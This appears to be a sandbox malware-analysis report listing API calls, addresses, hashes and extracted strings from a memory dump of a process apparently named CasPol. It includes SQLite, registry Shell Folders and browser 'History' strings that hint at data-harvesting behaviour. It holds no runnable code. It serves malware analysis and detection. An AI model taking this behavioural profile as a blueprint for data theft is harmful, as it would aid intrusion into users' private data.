                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                  • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                  • memset.MSVCRT ref: 00409042
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                    • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2507021081-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4131324427-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                  • String ID: General
                                                                                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                  • API String ID: 0-1953309616
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4053608372-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                                                                                  • String ID: @@@@$History
                                                                                                                                                                                  • API String ID: 1872909662-685208920
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                  • String ID: edit
                                                                                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                  • API String ID: 3150196962-1506664499
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1889144086-0
                                                                                                                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1661045500-0
                                                                                                                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
